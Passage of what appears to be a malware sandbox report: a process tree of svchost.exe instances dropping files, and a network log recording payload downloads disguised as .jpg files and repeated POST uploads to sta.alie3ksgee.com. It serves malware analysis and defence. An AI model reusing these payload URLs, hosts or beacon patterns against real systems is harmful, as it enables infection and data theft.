    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    PID:5064
- - C:\Windows\system32\svchost.exe
    "C:\Windows\system32\svchost.exe"
    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    PID:1916
- - C:\Windows\system32\svchost.exe
    "C:\Windows\system32\svchost.exe"
    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    PID:3312
- - C:\Windows\system32\svchost.exe
    "C:\Windows\system32\svchost.exe"
    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    PID:3412
- - C:\Windows\system32\svchost.exe
    "C:\Windows\system32\svchost.exe"
    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    PID:1912
- - C:\Windows\system32\svchost.exe
    "C:\Windows\system32\svchost.exe"
    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    PID:1636
- - C:\Windows\system32\svchost.exe
    "C:\Windows\system32\svchost.exe"
    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    PID:2876
- - C:\Windows\system32\svchost.exe
    "C:\Windows\system32\svchost.exe"
    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    PID:4972
- - C:\Windows\system32\svchost.exe
    "C:\Windows\system32\svchost.exe"
    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    PID:1704
- - C:\Windows\system32\svchost.exe
    "C:\Windows\system32\svchost.exe"
    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    PID:1532

Network

DNS

sta.alie3ksgee.com

svchost.exe

Remote address:

8.8.8.8:53

Request

sta.alie3ksgee.com

IN A

Response

sta.alie3ksgee.com

IN A

103.146.158.221
GET

http://sta.alie3ksgee.com/xxxxxxxx.jpg

e6de332ad778f7a7cf160efa60656c3ac960dc77806905493d5cffe58ee1de16.exe

Remote address:

103.146.158.221:80

Request

GET /xxxxxxxx.jpg HTTP/1.1
User-Agent: HTTPREAD
Host: sta.alie3ksgee.com
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:10:57 GMT
Content-Type: image/jpeg
Content-Length: 389194
Last-Modified: Wed, 22 May 2024 07:48:26 GMT
Connection: keep-alive
ETag: "664da34a-5f04a"
Expires: Sat, 13 Jul 2024 06:10:57 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GET

http://sta.alie3ksgee.com/aaaaaaaa.jpg

e6de332ad778f7a7cf160efa60656c3ac960dc77806905493d5cffe58ee1de16.exe

Remote address:

103.146.158.221:80

Request

GET /aaaaaaaa.jpg HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: sta.alie3ksgee.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:11:00 GMT
Content-Type: image/jpeg
Content-Length: 2004147
Last-Modified: Sat, 01 Jun 2024 06:03:14 GMT
Connection: keep-alive
ETag: "665ab9a2-1e94b3"
Expires: Sat, 13 Jul 2024 06:11:00 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GET

http://sta.alie3ksgee.com/123.456

e6de332ad778f7a7cf160efa60656c3ac960dc77806905493d5cffe58ee1de16.exe

Remote address:

103.146.158.221:80

Request

GET /123.456 HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: sta.alie3ksgee.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:11:16 GMT
Content-Type: application/octet-stream
Content-Length: 129536
Last-Modified: Wed, 22 May 2024 09:35:57 GMT
Connection: keep-alive
ETag: "664dbc7d-1fa00"
Accept-Ranges: bytes
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.dual-a-0034.a-msedge.net

g-bing-com.dual-a-0034.a-msedge.net

IN CNAME

dual-a-0034.a-msedge.net

dual-a-0034.a-msedge.net

IN A

204.79.197.237

dual-a-0034.a-msedge.net

IN A

13.107.21.237
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8_loITGXFTi6PeZSKY6CgWDVUCUw8H8AfUdMFqjJEmQNdHs-Dqx7ibW9K9GxZZTcHGo8DbFowgF2Z9_nBck49zlEgQ92f1ZcPQ8s30PhlH-OBM-X1AlfguFB8p3w1oGuE4liRaaHRm93Ip2kBFWAsiAj7HB1Z-6qdHeiP8Wl0Fp94ywn8%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZmV4Y2VsJTNmb2NpZCUzZGNtbWlleWJ1cjRj%26rlid%3De2455dbd6fc8159f78543bd5c75b72d8&TIME=20240611T194241Z&CID=531098720&EID=531098720&tids=15000&adUnitId=11730597&localId=w:E27E96ED-1C24-B87C-D753-8842C7811920&deviceId=6825835402279670&muid=E27E96ED1C24B87CD7538842C7811920

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8_loITGXFTi6PeZSKY6CgWDVUCUw8H8AfUdMFqjJEmQNdHs-Dqx7ibW9K9GxZZTcHGo8DbFowgF2Z9_nBck49zlEgQ92f1ZcPQ8s30PhlH-OBM-X1AlfguFB8p3w1oGuE4liRaaHRm93Ip2kBFWAsiAj7HB1Z-6qdHeiP8Wl0Fp94ywn8%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZmV4Y2VsJTNmb2NpZCUzZGNtbWlleWJ1cjRj%26rlid%3De2455dbd6fc8159f78543bd5c75b72d8&TIME=20240611T194241Z&CID=531098720&EID=531098720&tids=15000&adUnitId=11730597&localId=w:E27E96ED-1C24-B87C-D753-8842C7811920&deviceId=6825835402279670&muid=E27E96ED1C24B87CD7538842C7811920 HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=0C09CED187A76E8E2E70DA4C86476F82; domain=.bing.com; expires=Tue, 08-Jul-2025 06:10:56 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 19D75AB7ABD64054976FCE190E473EA3 Ref B: LON04EDGE1013 Ref C: 2024-06-13T06:10:56Z
date: Thu, 13 Jun 2024 06:10:55 GMT
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8_loITGXFTi6PeZSKY6CgWDVUCUw8H8AfUdMFqjJEmQNdHs-Dqx7ibW9K9GxZZTcHGo8DbFowgF2Z9_nBck49zlEgQ92f1ZcPQ8s30PhlH-OBM-X1AlfguFB8p3w1oGuE4liRaaHRm93Ip2kBFWAsiAj7HB1Z-6qdHeiP8Wl0Fp94ywn8%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZmV4Y2VsJTNmb2NpZCUzZGNtbWlleWJ1cjRj%26rlid%3De2455dbd6fc8159f78543bd5c75b72d8&TIME=20240611T194241Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:E27E96ED-1C24-B87C-D753-8842C7811920&deviceId=6825835402279670&muid=E27E96ED1C24B87CD7538842C7811920

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8_loITGXFTi6PeZSKY6CgWDVUCUw8H8AfUdMFqjJEmQNdHs-Dqx7ibW9K9GxZZTcHGo8DbFowgF2Z9_nBck49zlEgQ92f1ZcPQ8s30PhlH-OBM-X1AlfguFB8p3w1oGuE4liRaaHRm93Ip2kBFWAsiAj7HB1Z-6qdHeiP8Wl0Fp94ywn8%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZmV4Y2VsJTNmb2NpZCUzZGNtbWlleWJ1cjRj%26rlid%3De2455dbd6fc8159f78543bd5c75b72d8&TIME=20240611T194241Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:E27E96ED-1C24-B87C-D753-8842C7811920&deviceId=6825835402279670&muid=E27E96ED1C24B87CD7538842C7811920 HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=0C09CED187A76E8E2E70DA4C86476F82; _EDGE_S=SID=0DF210CAF20E686228FE0457F3CE6925

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=yeh9de3bvc8F0bDJ66ScwgoMS1kBFM-54Jb1ZgglnIM; domain=.bing.com; expires=Tue, 08-Jul-2025 06:10:56 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 2880AB918CC44B99AE93890865171480 Ref B: LON04EDGE1013 Ref C: 2024-06-13T06:10:56Z
date: Thu, 13 Jun 2024 06:10:55 GMT
GET

https://www.bing.com/aes/c.gif?RG=440a5f9c1f04400d878275eb0619a83c&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240611T194241Z&adUnitId=11730597&localId=w:E27E96ED-1C24-B87C-D753-8842C7811920&deviceId=6825835402279670

Remote address:

23.62.61.162:443

Request

GET /aes/c.gif?RG=440a5f9c1f04400d878275eb0619a83c&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240611T194241Z&adUnitId=11730597&localId=w:E27E96ED-1C24-B87C-D753-8842C7811920&deviceId=6825835402279670 HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=0C09CED187A76E8E2E70DA4C86476F82

Response

HTTP/2.0 200

cache-control: private,no-store
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 60EA9B14BC9541C4B0BF2908E813960F Ref B: DUS30EDGE0314 Ref C: 2024-06-13T06:10:56Z
content-length: 0
date: Thu, 13 Jun 2024 06:10:56 GMT
set-cookie: _EDGE_S=SID=0DF210CAF20E686228FE0457F3CE6925; path=/; httponly; domain=bing.com
set-cookie: MUIDB=0C09CED187A76E8E2E70DA4C86476F82; path=/; httponly; expires=Tue, 08-Jul-2025 06:10:56 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.9e3d3e17.1718259056.1cd715e2
DNS

140.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

140.32.126.40.in-addr.arpa

IN PTR

Response
DNS

144.107.17.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

144.107.17.2.in-addr.arpa

IN PTR

Response

144.107.17.2.in-addr.arpa

IN PTR

a2-17-107-144deploystaticakamaitechnologiescom
DNS

162.61.62.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

162.61.62.23.in-addr.arpa

IN PTR

Response

162.61.62.23.in-addr.arpa

IN PTR

a23-62-61-162deploystaticakamaitechnologiescom
DNS

221.158.146.103.in-addr.arpa

Remote address:

8.8.8.8:53

Request

221.158.146.103.in-addr.arpa

IN PTR

Response
DNS

myxqbh.top

svchost.exe

Remote address:

8.8.8.8:53

Request

myxqbh.top

IN A

Response

myxqbh.top

IN A

182.108.15.99
DNS

99.15.108.182.in-addr.arpa

Remote address:

8.8.8.8:53

Request

99.15.108.182.in-addr.arpa

IN PTR

Response
DNS

86.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.23.85.13.in-addr.arpa

IN PTR

Response
POST

http://sta.alie3ksgee.com/update/upload?cid=0&validate=1c12183a546547536b97683d6dd7dcad

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/upload?cid=0&validate=1c12183a546547536b97683d6dd7dcad HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 54976
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:11:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 60
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:11:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 54958
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:12:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 60
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:12:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 54970
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:12:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 60
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:12:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 54970
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:12:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 60
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:12:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 54970
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:12:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 60
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:12:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 54970
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:13:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 60
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:13:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 54970
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:13:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 60
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:13:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 54970
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:13:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 60
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:13:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 54970
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:13:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 60
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:13:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 54970
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:13:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 60
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:13:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 54972
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:14:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 60
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:14:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
